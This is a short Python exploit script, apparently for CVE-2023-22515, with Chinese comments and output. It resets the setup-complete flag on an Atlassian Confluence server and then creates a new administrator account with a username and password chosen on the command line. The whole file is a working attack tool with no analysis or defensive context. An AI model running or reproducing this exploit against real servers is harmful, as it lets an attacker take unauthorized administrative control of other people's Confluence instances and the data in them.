import sys

import requests


def exp(url, username, password):
    headers2 = {
        "X-Atlassian-Token": "no-check",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    headers3 = {
        "X-Atlassian-Token": "no-check",
    }
    data = f"username={username}&fullName={username}&email={username}@localhost&password={password}&confirm={password}&setup-next-button=Next"
    if url.endswith('/'):  # 去除末尾斜杠
        url = url[:-1]
    url1 = url + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    r1 = requests.get(url=url1)
    url2 = url + "/setup/setupadministrator.action"
    r2 = requests.post(url=url2, headers=headers2, data=data, allow_redirects=False)
    if r2.headers.get("Location") == "/setup/finishsetup.action":
        url3 = url + "/setup/finishsetup.action"
        r3 = requests.post(url=url3, headers=headers3)
        if r3.status_code == 200:
            print("管理员账户创建成功!")
            print("账户密码为: " + username + "/" + password)
        else:
            print("发生意料之外的错误!")
    else:
        print("创建用户失败!")
        print(r2.headers.get("Location"))
        print(r2.status_code)

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("用法: python3 CVE-2023-22515.py url username password")
        sys.exit(1)
    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    exp(url, username, password)